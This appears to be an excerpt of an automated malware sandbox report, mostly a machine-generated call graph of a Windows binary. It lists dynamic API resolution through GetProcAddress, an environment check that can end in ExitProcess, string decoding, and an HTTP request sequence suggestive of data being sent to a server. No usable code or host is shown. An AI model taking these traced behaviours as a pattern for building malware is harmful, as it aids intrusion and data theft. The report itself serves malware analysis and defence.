38211 ac2e89 38210->38211 38212 ac4610 2 API calls 38211->38212 38213 ac2ea2 38212->38213 38214 ac4610 2 API calls 38213->38214 38215 ac2ebb 38214->38215 38216 ac4610 2 API calls 38215->38216 38217 ac2ed4 38216->38217 38218 ac4610 2 API calls 38217->38218 38219 ac2eed 38218->38219 38220 ac4610 2 API calls 38219->38220 38221 ac2f06 38220->38221 38222 ac4610 2 API calls 38221->38222 38223 ac2f1f 38222->38223 38224 ac4610 2 API calls 38223->38224 38225 ac2f38 38224->38225 38226 ac4610 2 API calls 38225->38226 38227 ac2f51 38226->38227 38228 ac4610 2 API calls 38227->38228 38229 ac2f6a 38228->38229 38230 ac4610 2 API calls 38229->38230 38231 ac2f83 38230->38231 38232 ac4610 2 API calls 38231->38232 38233 ac2f9c 38232->38233 38234 ac4610 2 API calls 38233->38234 38235 ac2fb5 38234->38235 38236 ac4610 2 API calls 38235->38236 38237 ac2fce 38236->38237 38238 ac4610 2 API calls 38237->38238 38239 ac2fe7 38238->38239 38240 ac4610 2 API calls 38239->38240 38241 ac3000 38240->38241 38242 ac4610 2 API calls 38241->38242 38243 ac3019 38242->38243 38244 ac4610 2 API calls 38243->38244 38245 ac3032 38244->38245 38246 ac4610 2 API calls 38245->38246 38247 ac304b 38246->38247 38248 ac4610 2 API calls 38247->38248 38249 ac3064 38248->38249 38250 ac4610 2 API calls 38249->38250 38251 ac307d 38250->38251 38252 ac4610 2 API calls 38251->38252 38253 ac3096 38252->38253 38254 ac4610 2 API calls 38253->38254 38255 ac30af 38254->38255 38256 ac4610 2 API calls 38255->38256 38257 ac30c8 38256->38257 38258 ac4610 2 API calls 38257->38258 38259 ac30e1 38258->38259 38260 ac4610 2 API calls 38259->38260 38261 ac30fa 38260->38261 38262 ac4610 2 API calls 38261->38262 38263 ac3113 38262->38263 38264 ac4610 2 API calls 38263->38264 38265 ac312c 38264->38265 38266 ac4610 2 API calls 38265->38266 38267 ac3145 38266->38267 38268 ac4610 2 API calls 38267->38268 38269 ac315e 38268->38269 38270 ac4610 2 API calls 38269->38270 38271 ac3177 38270->38271 38272 ac4610 2 API calls 38271->38272 38273 ac3190 
38272->38273 38274 ac4610 2 API calls 38273->38274 38275 ac31a9 38274->38275 38276 ac4610 2 API calls 38275->38276 38277 ac31c2 38276->38277 38278 ac4610 2 API calls 38277->38278 38279 ac31db 38278->38279 38280 ac4610 2 API calls 38279->38280 38281 ac31f4 38280->38281 38282 ac4610 2 API calls 38281->38282 38283 ac320d 38282->38283 38284 ac4610 2 API calls 38283->38284 38285 ac3226 38284->38285 38286 ac4610 2 API calls 38285->38286 38287 ac323f 38286->38287 38288 ac4610 2 API calls 38287->38288 38289 ac3258 38288->38289 38290 ac4610 2 API calls 38289->38290 38291 ac3271 38290->38291 38292 ac4610 2 API calls 38291->38292 38293 ac328a 38292->38293 38294 ac4610 2 API calls 38293->38294 38295 ac32a3 38294->38295 38296 ac4610 2 API calls 38295->38296 38297 ac32bc 38296->38297 38298 ac4610 2 API calls 38297->38298 38299 ac32d5 38298->38299 38300 ac4610 2 API calls 38299->38300 38301 ac32ee 38300->38301 38302 ac4610 2 API calls 38301->38302 38303 ac3307 38302->38303 38304 ac4610 2 API calls 38303->38304 38305 ac3320 38304->38305 38306 ac4610 2 API calls 38305->38306 38307 ac3339 38306->38307 38308 ac4610 2 API calls 38307->38308 38309 ac3352 38308->38309 38310 ac4610 2 API calls 38309->38310 38311 ac336b 38310->38311 38312 ac4610 2 API calls 38311->38312 38313 ac3384 38312->38313 38314 ac4610 2 API calls 38313->38314 38315 ac339d 38314->38315 38316 ac4610 2 API calls 38315->38316 38317 ac33b6 38316->38317 38318 ac4610 2 API calls 38317->38318 38319 ac33cf 38318->38319 38320 ac4610 2 API calls 38319->38320 38321 ac33e8 38320->38321 38322 ac4610 2 API calls 38321->38322 38323 ac3401 38322->38323 38324 ac4610 2 API calls 38323->38324 38325 ac341a 38324->38325 38326 ac4610 2 API calls 38325->38326 38327 ac3433 38326->38327 38328 ac4610 2 API calls 38327->38328 38329 ac344c 38328->38329 38330 ac4610 2 API calls 38329->38330 38331 ac3465 38330->38331 38332 ac4610 2 API calls 38331->38332 38333 ac347e 38332->38333 38334 ac4610 2 API calls 38333->38334 38335 ac3497 38334->38335 
38336 ac4610 2 API calls 38335->38336 38337 ac34b0 38336->38337 38338 ac4610 2 API calls 38337->38338 38339 ac34c9 38338->38339 38340 ac4610 2 API calls 38339->38340 38341 ac34e2 38340->38341 38342 ac4610 2 API calls 38341->38342 38343 ac34fb 38342->38343 38344 ac4610 2 API calls 38343->38344 38345 ac3514 38344->38345 38346 ac4610 2 API calls 38345->38346 38347 ac352d 38346->38347 38348 ac4610 2 API calls 38347->38348 38349 ac3546 38348->38349 38350 ac4610 2 API calls 38349->38350 38351 ac355f 38350->38351 38352 ac4610 2 API calls 38351->38352 38353 ac3578 38352->38353 38354 ac4610 2 API calls 38353->38354 38355 ac3591 38354->38355 38356 ac4610 2 API calls 38355->38356 38357 ac35aa 38356->38357 38358 ac4610 2 API calls 38357->38358 38359 ac35c3 38358->38359 38360 ac4610 2 API calls 38359->38360 38361 ac35dc 38360->38361 38362 ac4610 2 API calls 38361->38362 38363 ac35f5 38362->38363 38364 ac4610 2 API calls 38363->38364 38365 ac360e 38364->38365 38366 ac4610 2 API calls 38365->38366 38367 ac3627 38366->38367 38368 ac4610 2 API calls 38367->38368 38369 ac3640 38368->38369 38370 ac4610 2 API calls 38369->38370 38371 ac3659 38370->38371 38372 ac4610 2 API calls 38371->38372 38373 ac3672 38372->38373 38374 ac4610 2 API calls 38373->38374 38375 ac368b 38374->38375 38376 ac4610 2 API calls 38375->38376 38377 ac36a4 38376->38377 38378 ac4610 2 API calls 38377->38378 38379 ac36bd 38378->38379 38380 ac4610 2 API calls 38379->38380 38381 ac36d6 38380->38381 38382 ac4610 2 API calls 38381->38382 38383 ac36ef 38382->38383 38384 ac4610 2 API calls 38383->38384 38385 ac3708 38384->38385 38386 ac4610 2 API calls 38385->38386 38387 ac3721 38386->38387 38388 ac4610 2 API calls 38387->38388 38389 ac373a 38388->38389 38390 ac4610 2 API calls 38389->38390 38391 ac3753 38390->38391 38392 ac4610 2 API calls 38391->38392 38393 ac376c 38392->38393 38394 ac4610 2 API calls 38393->38394 38395 ac3785 38394->38395 38396 ac4610 2 API calls 38395->38396 38397 ac379e 38396->38397 38398 ac4610 2 
API calls 38397->38398 38399 ac37b7 38398->38399 38400 ac4610 2 API calls 38399->38400 38401 ac37d0 38400->38401 38402 ac4610 2 API calls 38401->38402 38403 ac37e9 38402->38403 38404 ac4610 2 API calls 38403->38404 38405 ac3802 38404->38405 38406 ac4610 2 API calls 38405->38406 38407 ac381b 38406->38407 38408 ac4610 2 API calls 38407->38408 38409 ac3834 38408->38409 38410 ac4610 2 API calls 38409->38410 38411 ac384d 38410->38411 38412 ac4610 2 API calls 38411->38412 38413 ac3866 38412->38413 38414 ac4610 2 API calls 38413->38414 38415 ac387f 38414->38415 38416 ac4610 2 API calls 38415->38416 38417 ac3898 38416->38417 38418 ac4610 2 API calls 38417->38418 38419 ac38b1 38418->38419 38420 ac4610 2 API calls 38419->38420 38421 ac38ca 38420->38421 38422 ac4610 2 API calls 38421->38422 38423 ac38e3 38422->38423 38424 ac4610 2 API calls 38423->38424 38425 ac38fc 38424->38425 38426 ac4610 2 API calls 38425->38426 38427 ac3915 38426->38427 38428 ac4610 2 API calls 38427->38428 38429 ac392e 38428->38429 38430 ac4610 2 API calls 38429->38430 38431 ac3947 38430->38431 38432 ac4610 2 API calls 38431->38432 38433 ac3960 38432->38433 38434 ac4610 2 API calls 38433->38434 38435 ac3979 38434->38435 38436 ac4610 2 API calls 38435->38436 38437 ac3992 38436->38437 38438 ac4610 2 API calls 38437->38438 38439 ac39ab 38438->38439 38440 ac4610 2 API calls 38439->38440 38441 ac39c4 38440->38441 38442 ac4610 2 API calls 38441->38442 38443 ac39dd 38442->38443 38444 ac4610 2 API calls 38443->38444 38445 ac39f6 38444->38445 38446 ac4610 2 API calls 38445->38446 38447 ac3a0f 38446->38447 38448 ac4610 2 API calls 38447->38448 38449 ac3a28 38448->38449 38450 ac4610 2 API calls 38449->38450 38451 ac3a41 38450->38451 38452 ac4610 2 API calls 38451->38452 38453 ac3a5a 38452->38453 38454 ac4610 2 API calls 38453->38454 38455 ac3a73 38454->38455 38456 ac4610 2 API calls 38455->38456 38457 ac3a8c 38456->38457 38458 ac4610 2 API calls 38457->38458 38459 ac3aa5 38458->38459 38460 ac4610 2 API calls 
38459->38460 38461 ac3abe 38460->38461 38462 ac4610 2 API calls 38461->38462 38463 ac3ad7 38462->38463 38464 ac4610 2 API calls 38463->38464 38465 ac3af0 38464->38465 38466 ac4610 2 API calls 38465->38466 38467 ac3b09 38466->38467 38468 ac4610 2 API calls 38467->38468 38469 ac3b22 38468->38469 38470 ac4610 2 API calls 38469->38470 38471 ac3b3b 38470->38471 38472 ac4610 2 API calls 38471->38472 38473 ac3b54 38472->38473 38474 ac4610 2 API calls 38473->38474 38475 ac3b6d 38474->38475 38476 ac4610 2 API calls 38475->38476 38477 ac3b86 38476->38477 38478 ac4610 2 API calls 38477->38478 38479 ac3b9f 38478->38479 38480 ac4610 2 API calls 38479->38480 38481 ac3bb8 38480->38481 38482 ac4610 2 API calls 38481->38482 38483 ac3bd1 38482->38483 38484 ac4610 2 API calls 38483->38484 38485 ac3bea 38484->38485 38486 ac4610 2 API calls 38485->38486 38487 ac3c03 38486->38487 38488 ac4610 2 API calls 38487->38488 38489 ac3c1c 38488->38489 38490 ac4610 2 API calls 38489->38490 38491 ac3c35 38490->38491 38492 ac4610 2 API calls 38491->38492 38493 ac3c4e 38492->38493 38494 ac4610 2 API calls 38493->38494 38495 ac3c67 38494->38495 38496 ac4610 2 API calls 38495->38496 38497 ac3c80 38496->38497 38498 ac4610 2 API calls 38497->38498 38499 ac3c99 38498->38499 38500 ac4610 2 API calls 38499->38500 38501 ac3cb2 38500->38501 38502 ac4610 2 API calls 38501->38502 38503 ac3ccb 38502->38503 38504 ac4610 2 API calls 38503->38504 38505 ac3ce4 38504->38505 38506 ac4610 2 API calls 38505->38506 38507 ac3cfd 38506->38507 38508 ac4610 2 API calls 38507->38508 38509 ac3d16 38508->38509 38510 ac4610 2 API calls 38509->38510 38511 ac3d2f 38510->38511 38512 ac4610 2 API calls 38511->38512 38513 ac3d48 38512->38513 38514 ac4610 2 API calls 38513->38514 38515 ac3d61 38514->38515 38516 ac4610 2 API calls 38515->38516 38517 ac3d7a 38516->38517 38518 ac4610 2 API calls 38517->38518 38519 ac3d93 38518->38519 38520 ac4610 2 API calls 38519->38520 38521 ac3dac 38520->38521 38522 ac4610 2 API calls 38521->38522 
38523 ac3dc5 38522->38523 38524 ac4610 2 API calls 38523->38524 38525 ac3dde 38524->38525 38526 ac4610 2 API calls 38525->38526 38527 ac3df7 38526->38527 38528 ac4610 2 API calls 38527->38528 38529 ac3e10 38528->38529 38530 ac4610 2 API calls 38529->38530 38531 ac3e29 38530->38531 38532 ac4610 2 API calls 38531->38532 38533 ac3e42 38532->38533 38534 ac4610 2 API calls 38533->38534 38535 ac3e5b 38534->38535 38536 ac4610 2 API calls 38535->38536 38537 ac3e74 38536->38537 38538 ac4610 2 API calls 38537->38538 38539 ac3e8d 38538->38539 38540 ac4610 2 API calls 38539->38540 38541 ac3ea6 38540->38541 38542 ac4610 2 API calls 38541->38542 38543 ac3ebf 38542->38543 38544 ac4610 2 API calls 38543->38544 38545 ac3ed8 38544->38545 38546 ac4610 2 API calls 38545->38546 38547 ac3ef1 38546->38547 38548 ac4610 2 API calls 38547->38548 38549 ac3f0a 38548->38549 38550 ac4610 2 API calls 38549->38550 38551 ac3f23 38550->38551 38552 ac4610 2 API calls 38551->38552 38553 ac3f3c 38552->38553 38554 ac4610 2 API calls 38553->38554 38555 ac3f55 38554->38555 38556 ac4610 2 API calls 38555->38556 38557 ac3f6e 38556->38557 38558 ac4610 2 API calls 38557->38558 38559 ac3f87 38558->38559 38560 ac4610 2 API calls 38559->38560 38561 ac3fa0 38560->38561 38562 ac4610 2 API calls 38561->38562 38563 ac3fb9 38562->38563 38564 ac4610 2 API calls 38563->38564 38565 ac3fd2 38564->38565 38566 ac4610 2 API calls 38565->38566 38567 ac3feb 38566->38567 38568 ac4610 2 API calls 38567->38568 38569 ac4004 38568->38569 38570 ac4610 2 API calls 38569->38570 38571 ac401d 38570->38571 38572 ac4610 2 API calls 38571->38572 38573 ac4036 38572->38573 38574 ac4610 2 API calls 38573->38574 38575 ac404f 38574->38575 38576 ac4610 2 API calls 38575->38576 38577 ac4068 38576->38577 38578 ac4610 2 API calls 38577->38578 38579 ac4081 38578->38579 38580 ac4610 2 API calls 38579->38580 38581 ac409a 38580->38581 38582 ac4610 2 API calls 38581->38582 38583 ac40b3 38582->38583 38584 ac4610 2 API calls 38583->38584 38585 ac40cc 
38584->38585 38586 ac4610 2 API calls 38585->38586 38587 ac40e5 38586->38587 38588 ac4610 2 API calls 38587->38588 38589 ac40fe 38588->38589 38590 ac4610 2 API calls 38589->38590 38591 ac4117 38590->38591 38592 ac4610 2 API calls 38591->38592 38593 ac4130 38592->38593 38594 ac4610 2 API calls 38593->38594 38595 ac4149 38594->38595 38596 ac4610 2 API calls 38595->38596 38597 ac4162 38596->38597 38598 ac4610 2 API calls 38597->38598 38599 ac417b 38598->38599 38600 ac4610 2 API calls 38599->38600 38601 ac4194 38600->38601 38602 ac4610 2 API calls 38601->38602 38603 ac41ad 38602->38603 38604 ac4610 2 API calls 38603->38604 38605 ac41c6 38604->38605 38606 ac4610 2 API calls 38605->38606 38607 ac41df 38606->38607 38608 ac4610 2 API calls 38607->38608 38609 ac41f8 38608->38609 38610 ac4610 2 API calls 38609->38610 38611 ac4211 38610->38611 38612 ac4610 2 API calls 38611->38612 38613 ac422a 38612->38613 38614 ac4610 2 API calls 38613->38614 38615 ac4243 38614->38615 38616 ac4610 2 API calls 38615->38616 38617 ac425c 38616->38617 38618 ac4610 2 API calls 38617->38618 38619 ac4275 38618->38619 38620 ac4610 2 API calls 38619->38620 38621 ac428e 38620->38621 38622 ac4610 2 API calls 38621->38622 38623 ac42a7 38622->38623 38624 ac4610 2 API calls 38623->38624 38625 ac42c0 38624->38625 38626 ac4610 2 API calls 38625->38626 38627 ac42d9 38626->38627 38628 ac4610 2 API calls 38627->38628 38629 ac42f2 38628->38629 38630 ac4610 2 API calls 38629->38630 38631 ac430b 38630->38631 38632 ac4610 2 API calls 38631->38632 38633 ac4324 38632->38633 38634 ac4610 2 API calls 38633->38634 38635 ac433d 38634->38635 38636 ac4610 2 API calls 38635->38636 38637 ac4356 38636->38637 38638 ac4610 2 API calls 38637->38638 38639 ac436f 38638->38639 38640 ac4610 2 API calls 38639->38640 38641 ac4388 38640->38641 38642 ac4610 2 API calls 38641->38642 38643 ac43a1 38642->38643 38644 ac4610 2 API calls 38643->38644 38645 ac43ba 38644->38645 38646 ac4610 2 API calls 38645->38646 38647 ac43d3 38646->38647 
38648 ac4610 2 API calls 38647->38648 38649 ac43ec 38648->38649 38650 ac4610 2 API calls 38649->38650 38651 ac4405 38650->38651 38652 ac4610 2 API calls 38651->38652 38653 ac441e 38652->38653 38654 ac4610 2 API calls 38653->38654 38655 ac4437 38654->38655 38656 ac4610 2 API calls 38655->38656 38657 ac4450 38656->38657 38658 ac4610 2 API calls 38657->38658 38659 ac4469 38658->38659 38660 ac4610 2 API calls 38659->38660 38661 ac4482 38660->38661 38662 ac4610 2 API calls 38661->38662 38663 ac449b 38662->38663 38664 ac4610 2 API calls 38663->38664 38665 ac44b4 38664->38665 38666 ac4610 2 API calls 38665->38666 38667 ac44cd 38666->38667 38668 ac4610 2 API calls 38667->38668 38669 ac44e6 38668->38669 38670 ac4610 2 API calls 38669->38670 38671 ac44ff 38670->38671 38672 ac4610 2 API calls 38671->38672 38673 ac4518 38672->38673 38674 ac4610 2 API calls 38673->38674 38675 ac4531 38674->38675 38676 ac4610 2 API calls 38675->38676 38677 ac454a 38676->38677 38678 ac4610 2 API calls 38677->38678 38679 ac4563 38678->38679 38680 ac4610 2 API calls 38679->38680 38681 ac457c 38680->38681 38682 ac4610 2 API calls 38681->38682 38683 ac4595 38682->38683 38684 ac4610 2 API calls 38683->38684 38685 ac45ae 38684->38685 38686 ac4610 2 API calls 38685->38686 38687 ac45c7 38686->38687 38688 ac4610 2 API calls 38687->38688 38689 ac45e0 38688->38689 38690 ac4610 2 API calls 38689->38690 38691 ac45f9 38690->38691 38692 ad9f20 38691->38692 38693 ada346 8 API calls 38692->38693 38694 ad9f30 43 API calls 38692->38694 38695 ada3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38693->38695 38696 ada456 38693->38696 38694->38693 38695->38696 38697 ada526 38696->38697 38698 ada463 8 API calls 38696->38698 38699 ada52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38697->38699 38700 ada5a8 38697->38700 38698->38697 38699->38700 38701 ada5b5 6 API calls 38700->38701 38702 ada647 38700->38702 38701->38702 38703 ada72f 38702->38703 38704 ada654 9 
API calls 38702->38704 38705 ada738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38703->38705 38706 ada7b2 38703->38706 38704->38703 38705->38706 38707 ada7ec 38706->38707 38708 ada7bb GetProcAddress GetProcAddress 38706->38708 38709 ada825 38707->38709 38710 ada7f5 GetProcAddress GetProcAddress 38707->38710 38708->38707 38711 ada922 38709->38711 38712 ada832 10 API calls 38709->38712 38710->38709 38713 ada98d 38711->38713 38714 ada92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38711->38714 38712->38711 38715 ada9ae 38713->38715 38716 ada996 GetProcAddress 38713->38716 38714->38713 38717 ad5ef3 38715->38717 38718 ada9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38715->38718 38716->38715 38719 ac1590 38717->38719 38718->38717 38989 ac16b0 38719->38989 38722 adaab0 lstrcpy 38723 ac15b5 38722->38723 38724 adaab0 lstrcpy 38723->38724 38725 ac15c7 38724->38725 38726 adaab0 lstrcpy 38725->38726 38727 ac15d9 38726->38727 38728 adaab0 lstrcpy 38727->38728 38729 ac1663 38728->38729 38730 ad5760 38729->38730 38731 ad5771 38730->38731 38732 adab30 2 API calls 38731->38732 38733 ad577e 38732->38733 38734 adab30 2 API calls 38733->38734 38735 ad578b 38734->38735 38736 adab30 2 API calls 38735->38736 38737 ad5798 38736->38737 38738 adaa50 lstrcpy 38737->38738 38739 ad57a5 38738->38739 38740 adaa50 lstrcpy 38739->38740 38741 ad57b2 38740->38741 38742 adaa50 lstrcpy 38741->38742 38743 ad57bf 38742->38743 38744 adaa50 lstrcpy 38743->38744 38745 ad57cc 38744->38745 38746 adabb0 lstrcpy 38745->38746 38747 ad5893 StrCmpCA 38745->38747 38748 ad58f0 StrCmpCA 38745->38748 38750 adaab0 lstrcpy 38745->38750 38754 ad5440 20 API calls 38745->38754 38756 ad5aa6 StrCmpCA 38745->38756 38761 ac1590 lstrcpy 38745->38761 38765 adaa50 lstrcpy 38745->38765 38766 adab30 lstrlen lstrcpy 38745->38766 38767 ad5510 25 API calls 38745->38767 38769 ad5c5b StrCmpCA 38745->38769 38781 ad59da StrCmpCA 38745->38781 38784 ad5b8f StrCmpCA 
38745->38784 38746->38745 38747->38745 38748->38745 38749 ad5a2c 38748->38749 38751 adabb0 lstrcpy 38749->38751 38750->38745 38752 ad5a38 38751->38752 38753 adab30 2 API calls 38752->38753 38755 ad5a46 38753->38755 38754->38745 38757 adab30 2 API calls 38755->38757 38756->38745 38758 ad5be1 38756->38758 38760 ad5a55 38757->38760 38759 adabb0 lstrcpy 38758->38759 38762 ad5bed 38759->38762 38763 ac16b0 lstrcpy 38760->38763 38761->38745 38764 adab30 2 API calls 38762->38764 38783 ad5a61 38763->38783 38768 ad5bfb 38764->38768 38765->38745 38766->38745 38767->38745 38770 adab30 2 API calls 38768->38770 38771 ad5c78 38769->38771 38772 ad5c66 Sleep 38769->38772 38773 ad5c0a 38770->38773 38774 adabb0 lstrcpy 38771->38774 38772->38745 38776 ac16b0 lstrcpy 38773->38776 38775 ad5c84 38774->38775 38777 adab30 2 API calls 38775->38777 38776->38783 38778 ad5c93 38777->38778 38779 adab30 2 API calls 38778->38779 38780 ad5ca2 38779->38780 38782 ac16b0 lstrcpy 38780->38782 38781->38745 38782->38783 38783->37837 38784->38745 38786 ad76dc 38785->38786 38787 ad76e3 GetVolumeInformationA 38785->38787 38786->38787 38788 ad7721 38787->38788 38789 ad778c GetProcessHeap RtlAllocateHeap 38788->38789 38790 ad77a9 38789->38790 38791 ad77b8 wsprintfA 38789->38791 38792 adaa50 lstrcpy 38790->38792 38793 adaa50 lstrcpy 38791->38793 38794 ad5ff7 38792->38794 38793->38794 38794->37858 38796 adaab0 lstrcpy 38795->38796 38797 ac48e9 38796->38797 38998 ac4800 38797->38998 38799 ac48f5 38800 adaa50 lstrcpy 38799->38800 38801 ac4927 38800->38801 38802 adaa50 lstrcpy 38801->38802 38803 ac4934 38802->38803 38804 adaa50 lstrcpy 38803->38804 38805 ac4941 38804->38805 38806 adaa50 lstrcpy 38805->38806 38807 ac494e 38806->38807 38808 adaa50 lstrcpy 38807->38808 38809 ac495b InternetOpenA StrCmpCA 38808->38809 38811 ac4994 38809->38811 38810 ac4f1b InternetCloseHandle 38813 ac4f38 38810->38813 38811->38810 39004 ad8cf0 38811->39004 39019 aca210 CryptStringToBinaryA 38813->39019 38814 ac49b3 39012 adac30 
38814->39012 38817 ac49c6 38819 adabb0 lstrcpy 38817->38819 38824 ac49cf 38819->38824 38820 adab30 2 API calls 38821 ac4f55 38820->38821 38822 adacc0 4 API calls 38821->38822 38825 ac4f6b 38822->38825 38823 ac4f77 ctype 38827 adaab0 lstrcpy 38823->38827 38828 adacc0 4 API calls 38824->38828 38826 adabb0 lstrcpy 38825->38826 38826->38823 38840 ac4fa7 38827->38840 38829 ac49f9 38828->38829 38830 adabb0 lstrcpy 38829->38830 38831 ac4a02 38830->38831 38832 adacc0 4 API calls 38831->38832 38833 ac4a21 38832->38833 38834 adabb0 lstrcpy 38833->38834 38835 ac4a2a 38834->38835 38836 adac30 3 API calls 38835->38836 38837 ac4a48 38836->38837 38838 adabb0 lstrcpy 38837->38838 38839 ac4a51 38838->38839 38841 adacc0 4 API calls 38839->38841 38840->37861 38842 ac4a70 38841->38842 38843 adabb0 lstrcpy 38842->38843 38844 ac4a79 38843->38844 38845 adacc0 4 API calls 38844->38845 38846 ac4a98 38845->38846 38847 adabb0 lstrcpy 38846->38847 38848 ac4aa1 38847->38848 38849 adacc0 4 API calls 38848->38849 38850 ac4acd 38849->38850 38851 adac30 3 API calls 38850->38851 38852 ac4ad4 38851->38852 38853 adabb0 lstrcpy 38852->38853 38854 ac4add 38853->38854 38855 ac4af3 InternetConnectA 38854->38855 38855->38810 38856 ac4b23 HttpOpenRequestA 38855->38856 38858 ac4f0e InternetCloseHandle 38856->38858 38859 ac4b78 38856->38859 38858->38810 38860 adacc0 4 API calls 38859->38860 38861 ac4b8c 38860->38861 38862 adabb0 lstrcpy 38861->38862 38863 ac4b95 38862->38863 38864 adac30 3 API calls 38863->38864 38865 ac4bb3 38864->38865 38866 adabb0 lstrcpy 38865->38866 38867 ac4bbc 38866->38867 38868 adacc0 4 API calls 38867->38868 38869 ac4bdb 38868->38869 38870 adabb0 lstrcpy 38869->38870 38871 ac4be4 38870->38871 38872 adacc0 4 API calls 38871->38872 38873 ac4c05 38872->38873 38874 adabb0 lstrcpy 38873->38874 38875 ac4c0e 38874->38875 38876 adacc0 4 API calls 38875->38876 38877 ac4c2e 38876->38877 38878 adabb0 lstrcpy 38877->38878 38879 ac4c37 38878->38879 38880 adacc0 4 API calls 38879->38880 38881 
ac4c56 38880->38881 38882 adabb0 lstrcpy 38881->38882 38883 ac4c5f 38882->38883 38884 adac30 3 API calls 38883->38884 38885 ac4c7d 38884->38885 38886 adabb0 lstrcpy 38885->38886 38887 ac4c86 38886->38887 38888 adacc0 4 API calls 38887->38888 38889 ac4ca5 38888->38889 38890 adabb0 lstrcpy 38889->38890 38891 ac4cae 38890->38891 38892 adacc0 4 API calls 38891->38892 38893 ac4ccd 38892->38893 38894 adabb0 lstrcpy 38893->38894 38895 ac4cd6 38894->38895 38896 adac30 3 API calls 38895->38896 38897 ac4cf4 38896->38897 38898 adabb0 lstrcpy 38897->38898 38899 ac4cfd 38898->38899 38900 adacc0 4 API calls 38899->38900 38901 ac4d1c 38900->38901 38902 adabb0 lstrcpy 38901->38902 38903 ac4d25 38902->38903 38904 adacc0 4 API calls 38903->38904 38905 ac4d46 38904->38905 38906 adabb0 lstrcpy 38905->38906 38907 ac4d4f 38906->38907 38908 adacc0 4 API calls 38907->38908 38909 ac4d6f 38908->38909 38910 adabb0 lstrcpy 38909->38910 38911 ac4d78 38910->38911 38912 adacc0 4 API calls 38911->38912 38913 ac4d97 38912->38913 38914 adabb0 lstrcpy 38913->38914 38915 ac4da0 38914->38915 38916 adac30 3 API calls 38915->38916 38917 ac4dbe 38916->38917 38918 adabb0 lstrcpy 38917->38918 38919 ac4dc7 38918->38919 38920 adaa50 lstrcpy 38919->38920 38921 ac4de2 38920->38921 38922 adac30 3 API calls 38921->38922 38923 ac4e03 38922->38923 38924 adac30 3 API calls 38923->38924 38925 ac4e0a 38924->38925 38926 adabb0 lstrcpy 38925->38926 38927 ac4e16 38926->38927 38928 ac4e37 lstrlen 38927->38928 38929 ac4e4a 38928->38929 38930 ac4e53 lstrlen 38929->38930 39018 adade0 38930->39018 38932 ac4e63 HttpSendRequestA 38933 ac4e82 InternetReadFile 38932->38933 38934 ac4eb7 InternetCloseHandle 38933->38934 38939 ac4eae 38933->38939 38937 adab10 38934->38937 38936 adacc0 4 API calls 38936->38939 38937->38858 38938 adabb0 lstrcpy 38938->38939 38939->38933 38939->38934 38939->38936 38939->38938 39025 adade0 38940->39025 38942 ad1a14 StrCmpCA 38943 ad1a1f ExitProcess 38942->38943 38944 ad1a27 38942->38944 38945 ad1c12 
38944->38945 38946 ad1aad StrCmpCA 38944->38946 38947 ad1acf StrCmpCA 38944->38947 38948 ad1b41 StrCmpCA 38944->38948 38949 ad1ba1 StrCmpCA 38944->38949 38950 ad1bc0 StrCmpCA 38944->38950 38951 ad1b63 StrCmpCA 38944->38951 38952 ad1b82 StrCmpCA 38944->38952 38953 ad1afd StrCmpCA 38944->38953 38954 ad1b1f StrCmpCA 38944->38954 38955 adab30 lstrlen lstrcpy 38944->38955 38945->37863 38946->38944 38947->38944 38948->38944 38949->38944 38950->38944 38951->38944 38952->38944 38953->38944 38954->38944 38955->38944 38956->37869 38957->37871 38958->37877 38959->37879 38960->37885 38961->37887 38962->37891 38963->37895 38964->37899 38965->37905 38966->37907 38967->37911 38968->37925 38969->37929 38970->37928 38971->37924 38972->37928 38973->37946 38974->37931 38975->37933 38976->37937 38977->37942 38978->37943 38979->37949 38980->37957 38981->37959 38982->37981 38983->37986 38984->37985 38985->37982 38986->37985 38987->37995 38990 adaab0 lstrcpy 38989->38990 38991 ac16c3 38990->38991 38992 adaab0 lstrcpy 38991->38992 38993 ac16d5 38992->38993 38994 adaab0 lstrcpy 38993->38994 38995 ac16e7 38994->38995 38996 adaab0 lstrcpy 38995->38996 38997 ac15a3 38996->38997 38997->38722 38999 ac4816 38998->38999 39000 ac4888 lstrlen 38999->39000 39024 adade0 39000->39024 39002 ac4898 InternetCrackUrlA 39003 ac48b7 39002->39003 39003->38799 39005 adaa50 lstrcpy 39004->39005 39006 ad8d04 39005->39006 39007 adaa50 lstrcpy 39006->39007 39008 ad8d12 GetSystemTime 39007->39008 39009 ad8d29 39008->39009 39010 adaab0 lstrcpy 39009->39010 39011 ad8d8c 39010->39011 39011->38814 39013 adac41 39012->39013 39014 adac98 39013->39014 39016 adac78 lstrcpy lstrcat 39013->39016 39015 adaab0 lstrcpy 39014->39015 39017 adaca4 39015->39017 39016->39014 39017->38817 39018->38932 39020 aca249 LocalAlloc 39019->39020 39021 ac4f3e 39019->39021 39020->39021 39022 aca264 CryptStringToBinaryA 39020->39022 39021->38820 39021->38823 39022->39021 39023 aca289 LocalFree 39022->39023 39023->39021 39024->39002 39025->38942

                                      Control-flow Graph

                                      control_flow_graph 660 ad9bb0-ad9bc4 call ad9aa0 663 ad9bca-ad9dde call ad9ad0 GetProcAddress * 21 660->663 664 ad9de3-ad9e42 LoadLibraryA * 5 660->664 663->664 666 ad9e5d-ad9e64 664->666 667 ad9e44-ad9e58 GetProcAddress 664->667 669 ad9e96-ad9e9d 666->669 670 ad9e66-ad9e91 GetProcAddress * 2 666->670 667->666 671 ad9e9f-ad9eb3 GetProcAddress 669->671 672 ad9eb8-ad9ebf 669->672 670->669 671->672 673 ad9ed9-ad9ee0 672->673 674 ad9ec1-ad9ed4 GetProcAddress 672->674 675 ad9f11-ad9f12 673->675 676 ad9ee2-ad9f0c GetProcAddress * 2 673->676 674->673 676->675
                                      APIs
                                      • GetProcAddress.KERNEL32(76210000,01541698), ref: 00AD9BF1
                                      • GetProcAddress.KERNEL32(76210000,01541710), ref: 00AD9C0A
                                      • GetProcAddress.KERNEL32(76210000,01541668), ref: 00AD9C22
                                      • GetProcAddress.KERNEL32(76210000,01541740), ref: 00AD9C3A
                                      • GetProcAddress.KERNEL32(76210000,01541788), ref: 00AD9C53
                                      • GetProcAddress.KERNEL32(76210000,01548A78), ref: 00AD9C6B
                                      • GetProcAddress.KERNEL32(76210000,01534F88), ref: 00AD9C83
                                      • GetProcAddress.KERNEL32(76210000,01535308), ref: 00AD9C9C
